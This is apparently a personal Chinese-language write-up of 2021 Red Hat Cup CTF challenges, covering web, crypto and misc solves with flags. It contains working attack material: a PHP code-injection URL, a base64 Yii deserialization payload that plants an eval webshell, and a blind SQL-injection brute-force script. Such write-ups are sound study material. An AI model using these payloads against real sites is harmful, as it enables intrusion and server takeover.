2021年第四届红帽杯部分解题记录,草稿里存了半年没发。
find-it
在这个输入点拼接代码可执行。
code=?code=<?php%20phpinfo();//
读取hack.php的内容,找到flag。
flag{bac134ff-5265-4fa4-b333-66a84983225f}
primegame
import math
from decimal import *
import random
from sympy import Matrix
import struct
getcontext().prec = int(100)
primes = [2]
for i in range(3, 100):
f = True
for j in primes:
if i * i < j:
break
if i % j == 0:
f = False
break
if f:
primes.append(i)
keys = []
for i in range(len(primes)):
keys.append(Decimal(int(primes[i])).ln())
arr = []
for v in keys:
arr.append(int(v * int(16) ** int(64)))
ct = 597952043660446249020184773232983974017780255881942379044454676980646417087515453
def encrypt(res):
h = Decimal(int(0))
for i in range(len(keys)):
h += res[i] * keys[i]
ct = int(h * int(16)**int(64))
return ct
def f(N):
ln = len(arr)
A = Matrix(ZZ, ln + 1, ln + 1)
for i in range(ln):
A[i, i] = 1
A[i, ln] = arr[i] // N
A[ln, i] = 64
A[ln, ln] = ct // N
res = A.LLL()
for i in range(ln + 1):
flag = True
for j in range(ln):
if -64 <= res[i][j] < 64:
continue
flag = False
break
if flag:
vec = [int(v + 64) for v in res[i][:-1]]
ret = encrypt(vec)
if ret == ct:
print(N, bytes(vec))
else:
print("NO", ret, bytes(vec))
for i in range(2, 10000):
print(i)
f(i)
替换 ct 为两个 out 中的字符串,运行得到的结果拼接后获得 flag
flag{715c39c3-1b46-4c23-8006-27b43eba2446}
framework
www.zip 下载源码,d 盾扫描发现后门,存在 yii 代码执行漏洞
构造 payload
http://eci-2zeebn8ci69dyqxvw06w.cloudeci1.ichunqiu.com//index.php?r=site%2Fabout&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXHdlYlxEYlNlc3Npb24iOjE6e3M6MTM6IndyaXRlQ2FsbGJhY2siO2E6Mjp7aTowO086MzI6InlpaVxjYWNoaW5nXEV4cHJlc3Npb25EZXBlbmRlbmN5IjoxOntzOjEwOiJleHByZXNzaW9uIjtzOjEwNzoiZmlsZV9wdXRfY29udGVudHMoJy92YXIvd3d3L2h0bWwvd2ViL2Fzc2V0cy95LnBocCcsJzw/cGhwIEBldmFsKCRfUkVRVUVTVFtlZWVdKTtzaG93X3NvdXJjZShfX0ZJTEVfXyk7Pz4nKTsiO31pOjE7czoxODoiZXZhbHVhdGVEZXBlbmRlbmN5Ijt9fX0K
在 assets/y.php 生成一句话,蚁剑链接,使用 bypass disable functions 插件连接shell 获取 flag。
flag{a7a179b8-9765-433c-9752-efd5a4b3be52}
hpcurve
import itertools
import struct
p = 10000000000000001119
R.<x> = GF(p)[]; y=x
f = y + y^7
C = HyperellipticCurve(f, 0)
J = C.jacobian()
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]
t = '66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5'
enc = bytes.fromhex(t)
known_pt = 'a' * 20 + 'flag{'
known_pt = known_pt.encode()
rng_output = bytes(e^^m for e,m in zip(enc, known_pt))
blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]
L = GF(p).algebraic_closure()
roots = [r[0] for r in u.change_ring(L).roots()]
RR.<zz> = PolynomialRing(L)
v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
vi = [v.coefficients()[i].as_finite_field_element()[1] for i in range(3)]
vi = [(int(-c), int(c)) for c in vi]
for rs in itertools.product(*vi):
q = struct.pack('<'+'Q'*len(rs), *rs)
rr = rng_output+q
#print(len(q))
#flag = bytes(rr[k%24]^^enc[k] for k in range(len(rr)))# :, enc))
#print(flag)
tt = ''
i = 0
for x in enc:
tt += chr((rng_output[i%24]^^x))
i+=1
print(tt)
运行上面脚本获取 后半部分 flag
import itertools
import struct
p = 10000000000000001119
R.<x> = GF(p)[]; y=x
f = y + y^7
C = HyperellipticCurve(f, 0)
J = C.jacobian()
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]
t = '66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5'
enc = bytes.fromhex(t)
known_pt = 'a' * 20 + 'flag{'
known_pt = known_pt.encode()
rng_output = bytes(e^^m for e,m in zip(enc, known_pt))
blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]
L = GF(p).algebraic_closure()
roots = [r[0] for r in u.change_ring(L).roots()]
for _ in range(10):
try:
RR.<zz> = PolynomialRing(L)
v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
vi = [v.coefficients()[i].as_finite_field_element()[1] for i in range(3)]
vi = [(int(-c), int(c)) for c in vi]
# print(vi)
for rs in itertools.product(*vi):
keys = struct.pack('<'+'Q'*len(rs), *rs)
leng = len(keys)
keys = list(keys)
enc = list(enc)
flag = ""
for i in range(len(enc)):
flag += chr(keys[i%leng]^^enc[i])
print(flag)
except:
pass
# flag = bytes(q[k%len(q)]^^enc[k] for k in range(len(enc)))# :, enc))
#print(flag)
运行后获取前半部分 flag
flag{1b82f60a-43ab-4f18-8ccc-97d120aae6fc}
WebsiteManger
import requests as req
import string
url = "http://eci-2zeir5o8p6vh5j4c0dvu.cloudeci1.ichunqiu.com/image.php?id=1&&exists(select/**/1/**/from/**/users/**/where/**/password/**/like/**/'"
r = "%')"
prefix = ""
while True:
for x in string.ascii_letters+string.digits+"}{!@#":
payload = url + prefix + x + r
print payload
f = req.get(payload,proxies = {"http":"127.0.0.1:8080"})
print f.text
if len(f.text) > 200:
prefix += x
break
将 burp 转发过程中的 header 中 && 替换成 %26%26,运行脚本获得密码 0df549b13756efae827f0 登陆获得 flag
flag{de1a4ad3-856c-4aa9-afd1-5d57971543a3}
。
签到
ebcdic编码,python原生不支持,需要安装额外库pip install ebcdic
。解码脚本如下:
import ebcdic
with open('EBCDIC.txt', 'rb') as f:
tmp = f.read()
print(tmp.decode('cp1141'))
输出内容flagäwe1c0me_t0_redhat2021ü
,调整一下flag{we1c0me_t0_redhat2021}
。